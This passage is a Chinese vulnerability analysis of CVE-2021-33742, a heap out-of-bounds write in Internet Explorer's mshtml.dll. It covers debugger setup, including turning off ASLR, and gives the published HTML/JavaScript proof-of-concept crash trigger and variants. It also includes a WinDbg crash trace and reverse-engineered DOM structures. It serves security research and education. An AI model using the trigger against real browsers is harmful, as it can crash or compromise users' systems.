漏洞背景
2021年07月14日Google威胁分析团队(TAG:Threat Analysis Group)发布了一篇标题为“How We Protect Users From 0-Day Attacks”的文章。这篇文章公布了2021年Google威胁分析团队发现的4个在野利用的0day漏洞的详细信息。Google Chrome中的CVE-2021-21166和CVE-2021-30551,Internet Explorer中的CVE-2021-33742和Apple Safari中的CVE-2021-1879。
2021年4月,TAG发现了一项针对亚美尼亚用户的攻击活动,该活动通过恶意的Office文档调用Internet Explorer加载远程的恶意Web页面来利用Internet Explorer渲染引擎中的一个漏洞进行攻击。该恶意文档通过使用Shell.Explorer.1 OLE对象嵌入远程ActiveX对象或通过VBA宏生成Internet Explorer进程并导航到恶意网页来实现攻击。此攻击中使用的漏洞被分配为CVE-2021-33742,并于2021年6月由Microsoft修复。
微软计划将于2022年6月停用Internet Explorer 11,用微软推出的新版本浏览器Microsoft Edge来替代它。为了兼容旧网站,Microsoft Edge内置了Internet Explorer模式。按理说,继续研究Internet Explorer漏洞,不再有较大意义,但是今年还是发生了多个Internet Explorer 0day漏洞在野利用的攻击事件,例如:CVE-2021-26411、CVE-2021-40444,所以研究Internet Explorer漏洞,还是存在一定的意义。
本文要分析的漏洞是存在于Trident渲染引擎/排版引擎中的一个漏洞。如今,在最新版的Windows11中,依旧可以看到Trident渲染引擎(mshtml.dll)和EdgeHTML渲染引擎(edgehtml.dll)的身影。Trident是Internet Explorer使用的排版引擎。它的第一个版本随着1997年10月发布的Internet Explorer 4发布,之后不断的加入新的技术并随着新版本的Internet Explorer发布。在Trident7.0(Internet Explorer 11使用)中,微软对Trident排版引擎做了重大的变动,除了加入新的技术之外,并增加了对网页标准的支持。EdgeHTML是由微软开发并用于Microsoft Edge的专有排版引擎。该排版引擎是Trident的一个分支,但EdgeHTML移除所有旧版Internet Explorer遗留下来的代码,并重写主要的代码以和其他现代浏览器的设计精神互通有无。
在Google威胁分析团队发布了上面所说的那篇文章之后,又在Google Project Zero的博客上公布了这些漏洞的细节。本文章就是对Internet Explorer中的CVE-2021-33742漏洞的分析过程的一个记录。我之前分析过老版本的Internet Explorer的漏洞,这是第一次比较正式的分析新版本Internet Explorer的漏洞,如有错误和不足之处,还望见谅。
漏洞简介
CVE-2021-33742是存在于Internet Explorer的Trident渲染引擎(mshtml.dll)中的一个堆越界写漏洞。这个漏洞是由于通过java script使用DOM innerHTML属性对内部html元素设置内容(包含文本字符串)时触发的。通过innerHTML属性修改标签之间的内容时,会造成IE生成的DOM树/DOM流的结构发生改变,IE会调用CSpliceTreeEngine类的相关函数对IE的DOM树/DOM流的结构进行调整。当调用CSpliceTreeEngine::RemoveSplice()去删除一些DOM树/DOM流结构时,恰好这些结构中包含文本字符串时,就有可能会造成堆越界写。
分析环境
提取漏洞模块
Windows 10 x64版本内置32位和64位两个版本的Internet Explorer,分别在“C:\Program Files (x86)\Internet Explorer”和“C:\Program Files\internet explorer”两个文件夹下。但是相应架构的Internet Explorer的Trident渲染引擎(mshtml.dll)位于“C:\Windows\SysWOW64\mshtml.dll”和“C:\Windows\System32\mshtml.dll”。64位操作系统能够独立运行32位和64位版本软件,“Program Files (x86)”和“SysWOW64”存放32位软件的软件模块,“Program Files”和“System32”存放64位软件的软件模块。32位软件并不能在64位系统中直接运行,所以微软设计了WoW64(Windows-on-Windows 64-bit),通过Wow64.dll、Wow64win.dll、Wow64cpu.dll三个dll文件进行32位和64位系统的切换来运行32位软件。
本次分析,我使用的是32位Internet Explorer的Trident渲染引擎(mshtml.dll),也就是“C:\Windows\SysWOW64\mshtml.dll”。
关闭ASLR
关闭了ASLR后,可以更方便的进行调试,dll模块的加载基址不会在每次调试时发生改变,造成调试障碍。Windows10是通过Windows Defender来关闭Windows缓解措施的。打开Windows Defender后,选择“应用和浏览器控制”,然后找到“Exploit Protection”,选择“Exploit Protection 设置”。注意:设置界面拥有两个选项卡,“系统设置”和“程序设置”。我们先看“系统设置”,与ASLR有关系的是“强制映像随机化(强制性ASLR)”、“随机化内存分配(自下而上ASLR)”、“高熵ASLR”,我们都将其设为关闭状态。先关闭“高熵ASLR”,然后再关闭其他两项。
“强制映像随机化(强制性ASLR)”,不管编译时是否使用“/DYNAMICBASE”编译选项进行编译,开启了“强制性ASLR”后,会对所有软件模块的加载基址进行随机化,包括未使用“/DYNAMICBASE”编译选项编译的软件模块。关于编译时是否使用了“/DYNAMICBASE”编译选项进行编译,可以使用“Detect It Easy”查看PE文件的“IMAGE_NT_HEADERS -> IMAGE_OPTIONAL_HEADER -> DllCharacteristics -> IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE”标志位是否进行了设置。
“随机化内存分配(自下而上ASLR)”,开启了该选项后,当我们使用malloc()或HeapAlloc()在堆上申请内存时,得到的堆块地址将在一定程度上进行随机化。
“高熵ASLR”,这个选项需要配合“随机化内存分配(自下而上ASLR)”选项使用,开启了该选项后,会在“随机化内存分配(自下而上ASLR)”基础上,更大程度的随机化堆块的分配地址。
接下来,我们来看“程序设置”。由于Windows10可以对单独的应用程序设置缓解措施的开启或关闭,并且替换“系统设置”中的设置,造成关闭了“系统设置”中所有与ASLR相关的缓解措施后,dll模块的加载基址还是在变化。切换到“程序设置”选项卡后,找到iexplore.exe,点击编辑,将所有与ASLR有关的设置的“替代系统设置”的勾去掉。
设置完成后,重启一下操作系统。
这样设置完后,你可能会发现,软件模块的加载基址仍然不是一个确定的值,这时,就需要使用16进制编辑器将PE文件头中的NT Headers->Optional Header->DllCharacteristics->IMAGEDLL_CHARACTERISTICS DYNAMIC_BASE设置为0,用其替换原有的软件模块。这样就彻底关闭了Internet Explorer的ASLR了。这里推荐使用010Editor,借助它的Templates功能,可以很方便的修改该标志位。
漏洞复现
我使用的是Google Project Zero的Ivan Fratric提供的PoC。
<html><head><script>var b = document.createElement("html"); b.innerHTML = Array(40370176).toString(); b.innerHTML = ""; </script></head><body></body></html>
由于原始PoC过于精简,无法观察到执行效果,对我理解程序的执行流程造成了一定的障碍。所以我尝试了以下几种经过修改的PoC,用于观察执行效果。
<html><head><script>window.onload=function(){ var b = document.createElement("html"); document.body.appendChild(b); var arr = Array(4); for (var i=0;i<4;i++){ arr[i] = 'A'; } b.innerHTML = arr.toString(); } </script></head><body></body></html>
执行效果如下:
我们可以得出以下结论:PoC通过HTML DOM方法document.createElement(),创建了一个“html”结点(同时创建“head”和“body”结点),并把新创建的“html”结点添加到原有的“body”结点中。然后,创建了一个Array数组并进行了初始化。最后将该数组转化为字符串,通过HTML DOM的innerHTML属性,添加到新创建的“html”结点中的“body”结点中。
原始PoC中,并未将创建的Array数组初始化,我们通过Chrome的开发者工具查看未初始化的Array数组转化为字符串后,得到的是什么。这有助于我们后面在调试PoC时,观察字符串所对应的内存数据。
可以看到,初始化后的Array数组转化成字符串后,每个元素是使用“,”分隔的。未初始化的Array数组转化成字符串后,只有一连串的“,”。其个数为Array数组元素个数减1。
<html><head><script>window.onload=function(){ var b = document.createElement("html"); document.body.appendChild(b); b.innerHTML = Array(40370176).toString(); b.innerHTML = ""; } </script></head><body></body></html>
经过测试,PoC2也可以成功造成Crash。关于document.createElement()的参数,只有“html”元素可以成功触发Crash,其他标签无法造成Crash(我不确定)。
好了,我们现在开始通过调试复现此漏洞。这里使用的是原始的PoC。首先打开Internet Explorer,拖入PoC,会弹出一个提示框“Internet Explorer已限制此网页运行脚本或ActiveX控件”,表示现在html中的java script代码还没有得到执行。这时,我们打开WinDbg,附加到iexplore.exe上,输入g命令运行,然后在Internet Explorer界面点击提示框中的“允许阻止的内容”(可能需要刷新一下)。然后Internet Explorer会执行异常,WinDbg会捕获到异常并中断下来。以下是Crash的现场情况:
(211c.80c): Break instruction exception - code 80000003 (first chance)ntdll!DbgBreakPoint:00007ffd`64a43150 cc int30:015> gModLoad: 00000000`70a90000 00000000`70aaf000 C:\Windows\SysWOW64\WLDP.DLLModLoad: 00000000`771f0000 00000000`77235000 C:\Windows\SysWOW64\WINTRUST.dllInvalid parameter passed to C runtime function.(211c.2320): Access violation - code c0000005(first chance) <---- 内存访问违例First chance exceptions are reported before any exception handling.This exception may be expected and handled.MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9:63a46809 66893c50 mov word ptr [eax+edx*2],di ds:002b:26e1a024=????0:004:x86> reax=2211a020 ebx=0504cb38 ecx=04915644 edx=02680002 esi=0504ca08 edi=0000fdefeip=63a46809 esp=0504c7a8 ebp=0504c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9:63a46809 66893c50 mov word ptr [eax+edx*2],di ds:002b:26e1a024=????0:004:x86> !address 26e1a024Usage: FreeBase Address: 00000000`22e1c000End Address: 00000000`63580000Region Size: 00000000`40764000 ( 1.007 GB)State: 00010000 MEM_FREEProtect: 00000001 PAGE_NOACCESS <---- 不可访问Type: <info not present at the target>Content source: 0 (invalid), length: 3c765fdc0:004:x86> k # ChildEBP RetAddr 000504c9f0 63a44fe6 MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9010504cb1c 63b91ff9 MSHTML!Tree::TreeWriter::SpliceTreeInternal+0x8d020504cbf8 63bca8e3 MSHTML!CDoc::CutCopyMove+0x148759030504cc2c 63a80d38 MSHTML!RemoveWithBreakOnEmpty+0x1499bd040504cd7c 63a80a5d MSHTML!InjectHtmlStream+0x29b050504cdc0 63a81a2f MSHTML!HandleHTMLInjection+0x86060504ceb8 63a816a2 MSHTML!CElement::InjectInternal+0x2c9070504cf2c 63a815ba MSHTML!CElement::InjectTextOrHTML+0xdf080504cf58 63a8153c MSHTML!CElement::Var_set_innerHTML+0x51090504cf80 6dd74dae MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerHTML+0x3c0a 0504cfec 6dcfed4e JSCRIPT9!Js::java scriptExternalFunction::ExternalFunctionThunk+0x1de0b0504d018 6dcfec9d JSCRIPT9!<lambda_58b9ba9eeb8f97b5e624add39c5039e7>::operator()+0xa00c 0504d044 6dcfec21 JSCRIPT9!ThreadContext::ExecuteImplicitCall<<lambda_58b9ba9eeb8f97b5e624add39c5039e7> >+0x730d 0504d090 6dc6583c JSCRIPT9!Js::java scriptOperators::CallSetter+0x4b0e 0504d0b0 6dc65527 JSCRIPT9!Js::InlineCache::TrySetProperty<1,1,1,1,0>+0x10c0f0504d104 6dd6eb85 JSCRIPT9!Js::InterpreterStackFrame::DoProfiledSetProperty<Js::OpLayoutElementCP_OneByte const >+0x97100504d11c 6dccf89b JSCRIPT9!Js::InterpreterStackFrame::OP_ProfiledSetProperty<Js::OpLayoutElementCP_OneByte const >+0x19110504d158 6dcc5208 JSCRIPT9!Js::InterpreterStackFrame::Process+0x1b6b120504d284 007f0fe9 JSCRIPT9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x2a8WARNING: Frame IP not in any known module. Following frames may be wrong.130504d290 6dd73bb3 0x7f0fe9140504d2d0 6dcfeb62 JSCRIPT9!Js::java scriptFunction::CallFunction<1>+0x93
通过观察WinDbg的输出信息,可以发现PoC造成了异常代码为0xc0000005的内存访问违例异常。0x63a46809处的异常代码向一个内存访问权限为PAGE_NOACCESS(不可访问)的地址写入一个值,从而造成Crash。通过k命令打印栈回溯,可以知道发生异常的代码位于MSHTML!CSpliceTreeEngine::RemoveSplice()函数中。
Internet Explorer DOM树的结构
当如今的Web开发者想到DOM树时,他们通常会想到这样的一个树:
这样的树看起来非常的简单,然而,现实是Internet Explorer的DOM树的实现是相当复杂的。
简单地说,Internet Explorer的DOM树是为了20世纪90年代的网页设计的。当时设计原始的数据结构时,网页主要是作为一个文档查看器(顶多包含几个动态的GIF图片和其他的静态图片)。因此,算法和数据结构更类似于为Microsoft Word等文档查看器提供支持的算法和数据结构。回想一下网页发展的早期,java script还没有出现,并不能通过编写脚本操作网页内容,因此我们所了解的DOM树并不存在。文本是组成网页的主要内容,DOM树的内部结构是围绕快速、高效的文本存储和操作而设计的。内容编辑(WYSIWYG:What You See Is What You Get)和以编辑光标为中心用于字符插入和有限的格式化的操作范式是当时网页开发的特点。
以文本为中心的设计
由于其以文本为中心的设计,DOM的原始结构是为了文本后备存储,这是一个复杂的文本数组系统,可以在最少或没有内存分配的情况下有效地拆分和连接文本。后备存储将文本(Text)和标签(Tag)表示为线性结构,可通过全局索引或字符位置(CP:Character Position)进行寻址。在给定的CP处插入文本非常高效,复制/粘贴一系列的文本由高效的“splice(拼接)”操作集中处理。下图直观地说明了如何将包含“hello world”的简单标记加载到文本后备存储中,以及如何为每个字符和标签分配CP。
文本后备存储为非文本实体(例如:标签和插入点)提供特殊的占位符。
为了存储非文本数据(例如:格式化和分组信息),另一组对象与后备存储分开进行维护:表示树位置的双向链表(TreePos对象)。TreePos对象在语义上等同于HTML源代码标记中的标签——每个逻辑元素都由一个开始和结束的TreePos表示。这种线性结构使得在深度优先前序遍历(几乎每个DOM搜索API和CSS/Layout算法都需要)DOM树时,可以很快的遍历整个DOM树。后来,微软扩展了TreePos对象以包括另外两种“位置”:TreeDataPos(用于指示文本的占位符)和PointerPos(用于指示诸如脱字符(“^大写字符”:用于表示不可打印的控制字符)、范围边界点之类的东西,并最终用于新特性,如:生成的内容结点)。
每个TreePos对象还包括一个CP对象,它充当标签的全局序数索引(对于遗留的document.all API之类的东西很有用)。从TreePos进入文本后备存储时需要用到CP,它可以使结点顺序的比较变得容易,甚至可以通过减去CP索引来得到文本的长度。
为了将它们联系在一起,一个TreeNode将成对的TreePos绑定在一起,并建立了java script DOM所期望的“树”层次结构,如下图所示:
增加复杂性层次结构
CP的设计造成了原有的DOM非常复杂。为了使整个系统正常工作,CP必须是最新的。因此,每次DOM操作(例如:输入文本、复制/粘贴、DOM API操作,甚至点击页面——这会在DOM中设置插入点)后都会更新CP。最初,DOM操作主要由HTML解析器或用户操作驱动,所以CP始终保持最新的模型是完全合理的。但是随着java script和DHTML的兴起,这些操作变得越来越普遍和频繁。
为了保持原来的更新速度,DOM添加了新的结构以提高更新的效率,并且伸展树(SplayTree)也随之产生,伸展树是在TreePos对象上添加了一系列重叠的树连接。起初,增加的复杂性提高了DOM的性能,可以用O(log n)速度实现全局CP更新。然而,伸展树实际上仅针对重复的局部搜索进行了优化(例如:针对以DOM树中某个位置为中心的更改),并没有证明对java script及其更多的随机访问模式具有同样的效果。
另一个设计现象是,前面提到的处理复制/粘贴的“Splice(拼接)”操作被扩展到处理所有的树突变。核心“Splice Engine(拼接引擎)”分三步工作,如下图所示:
在步骤1中,引擎将通过从操作开始到结束遍历树的位置(TreePos)来“记录”拼接信息。然后创建一个拼接记录,其中包含此操作的命令指令(在浏览器的还原栈(Undo Stack)中重用的结构)。
在步骤2中,从树中删除与操作关联的所有结点(即TreeNode和TreePos对象)。请注意,在IE DOM树中,TreeNode/TreePos对象与脚本引用的Element对象不同,TreeNode/TreePos对象可以使标签重叠更容易,所以删除它们并不是一个功能性问题。
最后,在步骤3中,拼接记录用于在目标位置“Replay(重现)”(重新创建)新对象。例如,为了完成appendChild DOM操作,拼接引擎(Splice Engine)在结点周围创建了一个范围(从TreeNode的起始TreePos到其结束TreePos),将此范围“拼接”到旧位置之外,并创建新结点来表示新位置处的结点及其子结点。可以想象,除了算法效率低下之外,这还造成了大量内存分配混乱。
原来的DOM没有经过封装
这些只是Internet Explorer DOM复杂性的几个示例。更糟糕的是,原来的DOM没有经过封装,因此从Parser一直到Display系统的代码都对CP/TreePos具有依赖性,这需要许多年的开发时间来解决。
复杂性很容易带来错误,DOM代码库的复杂性对于软件的可靠性是一种负担。根据内部调查,从IE7到IE11,大约28%的IE可靠性错误源自核心DOM组件中的代码。而且这种复杂性也直接削弱了IE的灵活性,每个新的HTML5功能的实现成本都变得更高,因为将新理念实现到现有架构中变得更加困难。
漏洞原理分析
逆向mshtml.dll中此漏洞的相关类
逆向主要是通过微软提供的pdb文件,以及先前泄露的IE5.5源码完成的。
CSpliceTreeEngine
实际为SpliceTree工作的类,也就是上面所说的拼接引擎(Splice Engine)的核心类。SpliceTree可以对树的某个范围进行移除(Remove)、复制(Copy)、移动(Move)或还原移除(Undo a Remove)。当DOM树发生变化时就会调用到此类的相关函数。
以下是IE源代码中的关于此类功能的一些注释:
移除(Remove):
1、此SpliceTree的行为是移除指定范围内的所有文本(Text),以及完全落入该范围内的所有元素(Element)。
2、语义是这样的,如果一个元素不完全在一个范围内,它的结束标签(End-Tags)将不会相对于其他元素进行移动。但是,可能需要减少该元素的结点数。发生这种情况时,结点将从右边界(Right Edge)移除。
3、范围内的不具有cling的指针(CTreeDataPos)最终会出现在开始标签(Begin-Tags)和结束标签(End-Tags)之间的空间中(可以说,它们应该放在开始标签和结束标签之间)。带有cling的指针会被删除。
复制(Copy):
1、复制指定范围内的所有文本(Text),以及完全落在该范围内的元素(Element)。
2、与左侧范围重叠的元素被复制;开始边界(Begin-Edges)隐含在范围的最开始处,其顺序与开始边界在源中出现的顺序相同。
3、与右侧范围重叠的元素被复制;结束边界(End-Edges)隐含在范围的最末端,其顺序与结束边界在源中出现的顺序相同。
移动(Move):
1、指定范围内的所有文本(Text),以及完全落入该范围内的元素(Element),都被移动(移除并插入到新位置,而不是复制)。
2、使用与移除(Remove)相同的规则修改与右侧或左侧重叠的元素,然后使用与复制(Copy)相同的规则将其复制到新位置。
还原移除(Undo a Remove):
1、这种对SpliceTree的操作只能从还原代码(Undo Code)中调用。本质上,它是由先前移除(Remove)中保存的数据驱动的移动(Move)。更复杂的是,我们必须将保存的数据编织到已经存在的树中。
下面是我经过逆向得出的IE11中CSpliceTreeEngine类对象的大部分成员。
+0x000bool _fInsert,+0x001bool _fRemove,+0x002bool _fDOMOperation,+0x003+0x004+0x005+0x006+0x007+0x008...+0x00C CMarkup *_pMarkupSource,+0x010 CTreeNode *_pnodeSourceTop,+0x014 CTreePos *_ptpSourceL,+0x018 CTreePos *_ptpSourceR,+0x01C CTreeNode *_pnodeSourceL,+0x020 CTreeNode *_pnodeSourceR,+0x024 CMarkup *_pMarkupTarget,+0x028 CTreePos * _ptpTarget,+0x02C CTreeNode *_pnodeTarget,+0x030 TCHAR* _pchRecord,+0x034 LONG _cchRecord,+0x038 LONG _cchRecordAlloc,+0x03C CSpliceRecord *_prec,+0x040 LONG _crec,+0x044 WhichAry _cAry,+0x048 BOOL _fReversed,+0x04C CSpliceRecordList* _paryRemoveUndo,+0x050 BOOL _fNoFreeRecord,+0x054 BOOL Flags,+0x058 CSpliceRecordList* ,+0x05C ,+0x060 CElement **_ppelRight,...+0x070 CSpliceRecordList _aryLeft,+0x080 CSpliceRecordList _aryInside,+0x090 CPtrAry<CElement*> _aryElementRight,+0x09C CPtrAry<CElement*> ,+0x0A8 CRemoveSpliceUndo _RemoveUndo,+0x0E4 CInsertSpliceUndo _InsertUndo,
下面是我经过逆向得出的IE11中CSpliceTreeEngine类的构造函数。
void __thiscall CSpliceTreeEngine::CSpliceTreeEngine(CSpliceTreeEngine *this, CDoc *pDoc){ CSpliceRecordList *aryInside; CRemoveSpliceUndo *pRemoveSpliceUndo; CSpliceRecordList *v5; CInsertSpliceUndo *pInsertSpliceUndo; int InitValue; this->_aryLeft.ElementCount_Flags = 0; this->_aryLeft.MaxElementCount = 0; this->_aryLeft.pData = 0; aryInside = &this->_aryInside; aryInside->ElementCount_Flags = 0; aryInside->MaxElementCount = 0; aryInside->pData = 0; this->_aryLeft.field_C = 1; this->_aryLeft.field_D &= 0xFEu; aryInside->field_D &= 0xFEu; aryInside->field_C = 1; memset(&this->_aryElementRight, 0, 0x18u); CMarkupUndoBase::CMarkupUndoBase(&this->_RemoveUndo, pDoc, 0, 0); pRemoveSpliceUndo->pVtbl = &CRemoveSpliceUndo::`vftable'; pRemoveSpliceUndo->field_28 = v5; pRemoveSpliceUndo->field_30 = v5; CMarkupUndoBase::CMarkupUndoBase(&this->_InsertUndo, pDoc, v5, v5); pInsertSpliceUndo->pVtbl = &CInsertSpliceUndo::`vftable'; memset(this, InitValue, 0x70u);}
CTreeNode
html代码中,每一对标签在IE中都会对应一个CTreeNode对象,每个CTreeNode对象的_tpBegin和_tpEnd成员分别用来标识对应标签的起始标签和结束标签。IE11中CTreeNode对象的第三个DWORD的低12位为标签的类型,通过IE5.5源代码中的enum ELEMENT_TAG枚举变量和pdb文件中全局g_atagdesc表,可以得出当前版本mshtml.dll渲染引擎中大部分标签对应的枚举值。
下面是我经过逆向得出的IE11中CTreeNode类对象的部分成员。
+0x000 CElement* _pElement,+0x004 CTreeNode* _pNodeParent,+0x008 DWORD _FlagsAndEtag,+0x00C CTreePos _tpBegin, +0x024 CTreePos _tpEnd, +0x03C SHORT _iCF,+0x03E SHORT _iPF,+0x040 SHORT _iFF,+0x042 SHORT _iSF,+0x044 DWORD _ulRefs_Flags,+0x048...+0x054 CFancyFormat* _pFancyFormat,+0x058...
CTreePos
每个标签的开始标签和结束标签都有一个对应的CTreePos对象,其包含在CTreeNode对象中。通过CTreePos对象可以找到任何一个标签在DOM流中的位置,以及在DOM树中的位置。IE通过CTreePos对象的_pFirstChild和_pNext成员构成了实际的DOM树,通过_pLeft和_pRight成员构成了DOM流(双链表)。
下面枚举变量EType是CTreePos对象所对应的元素的类型。
enum EType { Uninit=0x0, NodeBeg=0x1, NodeEnd=0x2, Text=0x4, Pointer=0x8};
下面枚举变量是某一个CTreePos对象在DOM树中与相连的CTreePos对象的关系,以及CTreePos对象的类型。
enum { TPF_ETYPE_MASK = 0x0F, TPF_LEFT_CHILD = 0x10, TPF_LAST_CHILD = 0x20, TPF_EDGE = 0x40, TPF_DATA2_POS = 0x40, TPF_DATA_POS = 0x80, TPF_FLAGS_MASK = 0xFF, TPF_FLAGS_SHIFT = 8};
下面是我经过逆向得出的IE11中CTreePos类对象的完整成员。
+0x000 DWORD _cElemLeftAndFlags, +0x004 DWORD _cchLeft, +0x008 CTreePos* _pFirstChild, +0x00C CTreePos* _pNext, +0x010 CTreePos* _pLeft, +0x014 CTreePos* _pRight,
CTreeNode::InitBeginPos()函数用于初始化起始标签对应的CTreePos对象。
CTreePos *__thiscall CTreeNode::InitBeginPos(CTreeNode *this, BOOL fEdge){ CTreePos *_tpBegin; _tpBegin = &this->_tpBegin; this->_tpBegin._cElemLeftAndFlags = this->_tpBegin._cElemLeftAndFlags & 0xFFFFFF31 | (fEdge ? 0x41 : 1);return _tpBegin;}
CTreeNode::InitEndPos()函数用于初始化结束标签对应的CTreePos对象。
CTreePos *__thiscall CTreeNode::InitEndPos(CTreeNode *this, BOOL fEdge){ CTreePos *_tpEnd; _tpEnd = &this->_tpEnd; this->_tpEnd._cElemLeftAndFlags = this->_tpEnd._cElemLeftAndFlags & 0xFFFFFF32 | (fEdge ? 0x42 : 2); return _tpEnd;}
CTreePos::GetCch()函数用于获取当前CTreePos对象对应的元素所占用的字符数量。起始标签和结束标签对应的字符数量为1,文本字符串为实际拥有的字符数,指针数据字符数的获取在CTreePos::GetContentCch()中(为0或1)。前面介绍DOM流结构时,在“以文本为中心的设计”中有提到过。
LONG __thiscall CTreePos::GetCch(CTreeDataPos *this){ DWORD cElemLeftAndFlags; cElemLeftAndFlags = this->_cElemLeftAndFlags; if ( (this->_cElemLeftAndFlags & 3) != 0 ) return (cElemLeftAndFlags >> 6) & 1; if ( (cElemLeftAndFlags & 4) != 0 ) returnthis->dptp.t._sid_cch & 0x1FFFFFF; return0;}
CTreeDataPos
CTreeDataPos继承于CTreePos。CTreeDataPos类为CTreePos类的扩展,用于表示文本数据和指针数据。此漏洞所涉及到的关键类,就是该类。
classCTreeDataPos :public CTreePos{ ... protected: union { DATAPOSTEXT t; DATAPOSPOINTER p; }; ...}structDATAPOSTEXT{unsignedlong _cch:25; unsignedlong _sid:7; long _lTextID; };structDATAPOSPOINTER{ DWORD_PTR _dwPointerAndGravityAndCling; };
下面是我经过逆向得出的IE11中CTreeDataPos类对象的完整成员。
+0x000 DWORD _cElemLeftAndFlags,+0x004 DWORD _cchLeft,+0x008 CTreePos* _pFirstChild,+0x00C CTreePos* _pNext,+0x010 CTreePos* _pLeft,+0x014 CTreePos* _pRight,+0x018 ULONG _ulRefs_Flags,+0x01C System::SmartObject *pSmartObject,+0x020 Tree::TextData *_pTextData,+0x024 DATAPOSTEXT t,+0x024 DATAPOSPOINTER p,
Tree::TreeWriter::AllocData1Pos()函数为指针数据类的CTreeDataPos对象分配内存,并初始化。IE8中此函数为CMarkup::AllocData1Pos()。
CTreeDataPos *__stdcall Tree::TreeWriter::AllocData1Pos(){ CTreeDataPos *pTreeDataPos; ULONG Flags; pTreeDataPos = MemoryProtection::HeapAllocClear<1>(g_hIsolatedHeap, 0x28u); if ( pTreeDataPos ) { Flags = pTreeDataPos->_ulRefs_Flags & 0x37; pTreeDataPos->pSmartObject = 0; pTreeDataPos->_pTextData = 0; pTreeDataPos->_cElemLeftAndFlags |= 0x80u; pTreeDataPos->_ulRefs_Flags = Flags | 0x40; pTreeDataPos->_pNext = 0; } return pTreeDataPos;}
Tree::TreeWriter::AllocData2Pos()函数为文本数据类的CTreeDataPos对象分配内存,并初始化。IE8中此函数为CMarkup::AllocData2Pos()。
CTreeDataPos *__stdcall Tree::TreeWriter::AllocData2Pos(){ CTreeDataPos *pTreeDataPos; ULONG Flags; pTreeDataPos = MemoryProtection::HeapAllocClear<1>(g_hIsolatedHeap, 0x2Cu); if ( pTreeDataPos ) { Flags = pTreeDataPos->_ulRefs_Flags; pTreeDataPos->pSmartObject = 0; pTreeDataPos->_pTextData = 0; pTreeDataPos->_cElemLeftAndFlags |= 0xC0u; pTreeDataPos->_ulRefs_Flags = Flags & 0x37 | 0x40; } return pTreeDataPos;}
IE11的CTreeDataPos拥有一个新的成员_pTextData,IE8及以前是没有的。以前文本数据是存在CTxtArray类中的,并通过CTxtPtr类对其进行访问。在IE11中并没有废除以前的方式,而是添加了一种新的用于存储文本数据的方式,即Tree::TextData类。
CTreeDataPos::SetTextData()函数用于设置CTreeDataPos对象中_pTextData成员存储的Tree::TextData类对象指针。
void __thiscall CTreeDataPos::SetTextData(CTreeDataPos *this, Tree::TextData *pNewTextData){ Tree::TextData *pOldTextData; ++pNewTextData->_ulRefs; pOldTextData = this->_pTextData; if ( pOldTextData ) { if ( pOldTextData->_ulRefs-- == 1 ) MemoryProtection::HeapFree(g_hProcessHeap, pOldTextData); } this->_pTextData = pNewTextData;}
CTreeDataPos::GetTextLength()函数可以从两种存储文本字符串的结构CTxtArray和Tree::TextData中获取到文本字符串的长度。此漏洞的根本原因就在于CTreeDataPos类中DATAPOSTEXT结构体的_cch成员(25bit)与Tree::TextData类中_cch成员(32bit)的大小不同,而在使用时进行混用,从而导致了堆块的越界写。具体原因,见后面漏洞的根本原因分析。
LONG __thiscall CTreeDataPos::GetTextLength(CTreeDataPos *this){ Tree::TextData *pTextData; LONG TextLength; pTextData = this->_pTextData; if ( pTextData ) TextLength = pTextData->_cch; else TextLength = CTreePos::ContentCch(this); return TextLength;}LONG __thiscall CTreePos::ContentCch(CTreeDataPos *this){ LONG Cch; if ( (this->_cElemLeftAndFlags & 8) != 0 && CTreePos::HasCollapsedWhitespace(this) ) Cch = 1; else Cch = this->dptp.t._sid_cch & 0x1FFFFFF; return Cch;}
CTreeDataPos::AppendText()用于在原来的字符串后面附加新的字符串。
HRESULT __thiscall CTreeDataPos::AppendText(CTreeDataPos *this, constwchar_t *AppendTextPtr, ULONG AppendTextCch, BOOL a1){ HRESULT hr; wchar_t *TargetTextPtr; ULONG TargetTextCch; Tree::TextData *pTextData; hr = 0; TargetTextPtr = Tree::TextData::GetText(this->_pTextData, 0, &TargetTextCch); pTextData = 0; Tree::TextData::Create(TargetTextPtr, TargetTextCch, AppendTextPtr, AppendTextCch, &pTextData); if ( pTextData ) CTreeDataPos::SetTextData(this, pTextData); else hr = 0x8007000E; if ( pTextData ) { if ( pTextData->_ulRefs-- == 1 ) MemoryProtection::HeapFree(g_hProcessHeap, pTextData); } return hr;}
Tree::TextData
下面是我经过逆向得出的IE11中Tree::TextData类对象的完整成员。
+0x000 ULONG _ulRefs,+0x004 LONG _cch,+0x008wchar_t _TextData[_cch],
Tree::TextData::AllocateMemory()函数用于为Tree::TextData对象分配内存。
void __fastcall Tree::TextData::AllocateMemory(LONG cch, Tree::TextData **ppTextData){ Tree::TextData *pNewTextData; Tree::TextData *pOldTextData; pNewTextData = MemoryProtection::HeapAlloc<0>(g_hProcessHeap, 2 * cch + 8); if ( pNewTextData ) { pNewTextData->_cch = cch; pNewTextData->_ulRefs = 1; } pOldTextData = *ppTextData; *ppTextData = pNewTextData; if ( pOldTextData ) { if ( pOldTextData->_ulRefs-- == 1 ) MemoryProtection::HeapFree(g_hProcessHeap, pOldTextData); }}
Tree::TextData::Create()函数用于根据传入的参数字符串创建一个Tree::TextData对象,并将字符串复制到Tree::TextData对象的空间,然后返回Tree::TextData对象的指针。
void __fastcall Tree::TextData::Create(constwchar_t *SourceTextPtr, ULONG SourceTextCch, Tree::TextData **ppTextData){ Tree::TextData::AllocateMemory(SourceTextCch, ppTextData); if ( *ppTextData ) _memcpy_s((*ppTextData)->_TextData, 2 * SourceTextCch, SourceTextPtr, 2 * SourceTextCch);}
下面函数是上面函数的重载。能够添加额外的字符串。
